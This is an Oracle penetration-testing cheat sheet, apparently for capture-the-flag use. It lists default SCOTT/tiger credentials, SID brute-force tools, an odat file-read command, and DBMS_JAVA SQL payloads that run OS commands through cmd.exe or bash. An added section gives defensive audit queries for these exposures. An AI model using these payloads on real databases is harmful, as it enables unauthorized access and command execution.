ORACLE
Oracle / ODAT
Basic Credentials
Username --> Scott
Password --> tiger
Brute-force SID
Use:
odat and its sidguesser to brute-force, with a link provided
Use metasploit and use auxiliary(admin/oracle/sid_brute)
Use sqlplus to login with the creds, or
Read file with odat:
odat ctxsys -s <ip> -d XE -U SCOTT -P tiger --sysdba --getFile flag.txt
Command Execution
-- 10g R2, 11g R1 and R2: DBMS_JAVA_TEST.FUNCALL()
SELECT DBMS_JAVA_TEST.FUNCALL('oracle/aurora/util/Wrapper','main','c:\\windows\\system32\\cmd.exe','/c', 'dir >c:\test.txt') FROM DUAL
SELECT DBMS_JAVA_TEST.FUNCALL('oracle/aurora/util/Wrapper','main','/bin/bash','-c','/bin/ls>/tmp/OUT2.LST') from dual
-- 11g R1 and R2: DBMS_JAVA.RUNJAVA()
SELECT DBMS_JAVA.RUNJAVA('oracle/aurora/util/Wrapper /bin/bash -c /bin/ls>/tmp/OUT.LST') FROM DUAL
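Audit queries for the exposures this page relies on (default SCOTT/tiger credentials, SYSDBA held by a demo account, and EXECUTE on DBMS_JAVA / DBMS_JAVA_TEST). This is an added example, not part of the original page; it assumes Oracle 11g or later and a DBA session with SELECT on the dictionary views named.

```sql
-- Added audit example (not from the original page). Run as a DBA, 11g or later.

-- 1. Accounts that still have a well-known default password (SCOTT/tiger is one)
--    and are open for login.
SELECT d.username, u.account_status
FROM   dba_users_with_defpwd d
JOIN   dba_users u ON u.username = d.username
WHERE  u.account_status = 'OPEN'
ORDER  BY d.username;

-- 2. Accounts in the password file that may connect AS SYSDBA / AS SYSOPER.
--    A demo account such as SCOTT should never appear here.
SELECT username, sysdba, sysoper
FROM   v$pwfile_users
ORDER  BY username;

-- 3. Who can execute the packages used for OS command execution above.
--    A PUBLIC grantee means every database user can call them.
SELECT grantee, owner, table_name, privilege
FROM   dba_tab_privs
WHERE  table_name IN ('DBMS_JAVA', 'DBMS_JAVA_TEST')
AND    privilege = 'EXECUTE'
ORDER  BY table_name, grantee;

-- 4. Enabled Java policy grants that let stored Java run programs
--    or write to the filesystem.
SELECT grantee, kind, type_name, name, action
FROM   dba_java_policy
WHERE  enabled = 'ENABLED'
AND    kind = 'GRANT'
AND    type_name = 'java.io.FilePermission'
AND    (LOWER(action) LIKE '%execute%' OR LOWER(action) LIKE '%write%')
ORDER  BY grantee, name;

-- 5. Remediation for an unused demo account found in query 1
--    (uncomment after confirming nothing depends on it).
-- ALTER USER scott ACCOUNT LOCK PASSWORD EXPIRE;
```

Rows from query 3 with grantee PUBLIC, or from query 4 for non-administrative grantees, are the ones to review first.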